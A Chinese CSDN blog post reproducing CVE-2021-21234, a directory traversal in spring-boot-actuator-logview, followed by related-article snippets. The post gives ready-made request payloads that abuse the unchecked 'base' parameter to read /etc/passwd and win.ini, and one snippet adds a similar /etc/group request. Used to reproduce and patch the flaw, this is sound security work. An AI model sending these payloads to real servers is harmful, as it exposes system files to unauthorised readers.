Spring Boot 目录遍历 (CVE-2021_21234)

最新推荐文章于 2024-07-19 09:46:01 发布
最新推荐文章于 2024-07-19 09:46:01 发布
阅读量4.5k 收藏 5
点赞数 1
分类专栏: 漏洞 文章标签: spring boot java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/122250864
版权

Spring Boot 目录遍历 (CVE-2021_21234)

漏洞简介:

spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端点公开日志文件目录。要查看的文件名和基本文件夹(相对于日志文件夹根)都可以通过请求参数指定。虽然检查了文件名参数以防止目录遍历攻击(因此filename=../somefile 将不起作用),但没有充分检查基本文件夹参数,因此filename=somefile&base=../ 可以访问日志记录基目录之外的文件)。该漏洞已在 0.2.13 版中修复。0.2.12 的任何用户都应该能够毫无问题地进行更新,因为该版本中没有其他更改。除了更新或删除依赖项之外,没有解决此漏洞的方法。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。此外,可以通过在反向代理后面部署应用程序来限制对 logview 端点的访问。

影响范围:

0.2.13版本之前

环境搭建 地址

漏洞复现:

访问首页

构造poc,view函数对filename参数进行合法性校验,但是没有对base参数进行合法性校验。
 

"{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # Windows

"{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # windows

"{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux

"{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux

这里采用linux的第一种,得到回显 

漏洞修复:

根据官方,升级到最新版

xzhome
关注
专栏目录
spring框架漏洞整理(Spingboot Thymeleaf模板注入)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 1657
Spingboot Thymeleaf模板注入修复方案 1. 设置ResponseBody注解 如果设置ResponseBody,则不再调用模板解析 2. 设置redirect重定向 @GetMapping("/safe/redirect") public String redirect(@RequestParam String url) { return "redirect:" + url; //CWE-601, as we can control the hostname in redirect
java框架漏洞_Spring 框架漏洞集合
weixin_42514750的博客
02-25 5558
虽说是Spring框架漏洞,但以下包含并不仅Spring Framework,Spring Boot,还有Spring Cloud,Spring Data,Spring Security等。CVE-2010-1622 Spring Framework class.classLoader类远程代码执行影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、S...
目录遍历Spring Boot 目录遍历CVE-2021-21234
wj33333的博客
11-17 364
spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。虽然检查了文件名参数以防止目录遍历攻击(因此`filename=../somefile` 将不起作用),但没有充分检查基本文件夹参数,因此`filename=somefile&base=../` 可以访问日志记录基目录之外的文件)。
Spring-Boot Actuator-logview 文件包含漏洞(CVE-2021-21234)分析
ML_Team的博客
10-29 7399
0x01 前言 首先声明一下CVE-2021-21234是属于文件包含漏洞,却被很多人起标题写成文件上传、文件、任意文件上传等等。起初看到这些标题的时候都给我整的一愣一愣的,到底是文件包含还是任意文件下载,还是文件上传。很凑巧,近期有Spring-Boot目标需要进行测试,因此做好记录。 0x02 漏洞分析 Actuator-logview是Spring Boot中的类似插件的库,此库的维护已经没有很久没有更新,而Actuator-logview中存在一个简单的日志文件查看器的功能,其端点路径为/
Spring Boot 目录遍历CVE-2021-21234
最新发布
qq_23003811的博客
07-19 470
Spring Boot 虽然检查了文件名参数以防止目录遍历攻击(因此。将不起作用),但没有充分检查基本文件夹参数,因此。可以访问日志记录目录之外的文件)。
Spring Boot 目录遍历CVE-2021-21234
m0_65150886的博客
01-02 1370
spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)参数来防止目录遍历,但是没有检查文件夹(base)参数,造成了目录遍历。1.spring-boot-actuator-logview 升级到0.2.13版本。
CVE-2021-21234 spring-boot-actuator-logview目录遍历漏洞
mirocky的博客
10-26 548
源码中对filename进行了校验但并未对路径进行校验。送入repeater打入payload,复现成功。首先开vulhub的镜像。点击下载,原数据包如下。
Spring Boot 目录遍历--表达式注入--代码执行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)
weixin_74985952的博客
09-26 611
spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)参数来防止目录遍历,但是没有检查文件夹(base)参数,造成了目录遍历
shiro权限绕过漏洞分析(cve-2020-1957) _ Spoock1
08-03
然而,如标题和描述中提到的,存在一个名为CVE-2020-1957的安全漏洞,允许攻击者绕过Shiro的权限检查,从而访问受保护的资源。 该漏洞主要发生在Shiro 1.5.1及更早版本中,当用户请求的URL(URL1)通过Shiro的权限...
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1855
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
学好Python开发你一定会用到这30框架种
轻松学python的博客
11-07 999
现在Python成为了炽手可热的一门语言,在如何快速入门的同时,如何进行高效的开发是一门语言非常重要的优势。我们收集马哥Python了超过2000名学员的意见和建议,对Python常用的框架进行了梳理,这些框架包括事件I/O,OLAP,Web开发,高性能网络通信,测试,爬虫等。 Python目前主流的应用包括:Web开发、图形界面开发、系统网络运维、网络编程、科学数字计算、3D游戏开发,而我...
springboot任意文件读取 CVE-2021-21234
weixin_43165012的博客
11-04 2745
一、简介 spring-boot-actuator-logview是简单的日志文件查看器作为 SpringBoot 执行器端,允许快速访问 spring-boot web 应用程序日志文件。 二、漏洞复现 项目地址: 链接: https://pan.baidu.com/s/1lm4AZfvLlP-x0GfrdMBKeA 提取码: juq3 下载该项目,并使用idea运行该项目。 打开网页便能查看日志情况 该漏洞存在LogViewEndpoint中, 只对filename进行了..
spring-boot-actuator-logview 文件包含(CVE-2021-21234)漏洞分析
weixin_50464560的博客
10-04 1069
前言 日常搬砖过程中在github发现的一个CVE,https://github.com/ARPSyndicate/kenzer-templates/blob/1f1dd550ddbde72cbe378452973b93b3e62003f5/jaeles/cvescan/medium/CVE-2021-21234.yam 看着带了springboot就分析了下 环境搭建 git clone https://github.com/cristianeph/vulnerabi...
【vulfocus漏洞复现】Spring bootCVE-2021_21234)
一剑开天门!的博客
03-02 5390
【vulfocus漏洞复现】Spring bootCVE-2021_21234)
springboot 任意文件下载漏洞 CVE-2021-21234
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
08-02 6295
文章目录复现修复 复现 项目地址:https://github.com/cristianeph/vulnerability-actuator-log-viewer 下载后使用IDEA打开工程,该漏洞是由spring-boot-actuator-logview 0.2.13之前的版本导致的。 运行项目,打开网址 poc如下: http://localhost:8887/manage/log/view?filename=/etc/group&base=../../../../../../../../
Spring Boot存在路径遍历漏洞CVE-2021-22118
日拱一卒无有尽,功不唐捐终入海
08-28 1219
背景:Spring Boot存在路径遍历漏洞。官方 issue也有对此的记录,感兴趣可以看下CVE-2021-22118 是一个在 Spring Boot 中发现的漏洞。该漏洞关系到 Spring Boot 的开发者工具(Devtools)中的远程更新(Remote Update)功能。在某些情况下,攻击者可能会利用这个功能进行目录遍历攻击,从而访问到系统中的敏感文件。远程更新功能被开启(spring.devtools.restart.enabled = true)。
【漏洞复现-spring-目录遍历】vulfocus/spring-cve_2020_5410
10-15 1378
spring-目录遍历
目录遍历漏洞小结
iteye_16188的博客
11-04 334
1. 首先使用dotdotpwn发现漏洞 2. 如果存在,则使用Panoptic搜集有用信息
mkdocs 1.2.2 内置开发服务器允许目录遍历cve-2021-40978
05-14
不幸的是,mkdocs的1.2.2版本存在一个漏洞(CVE-2021-40978),如果使用内置的开发服务器,攻击者可以利用目录遍历漏洞来读取服务器上任何文件。这个漏洞的根本原因在于mkdocs没有正确处理用户提供的HTTP请求参数,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值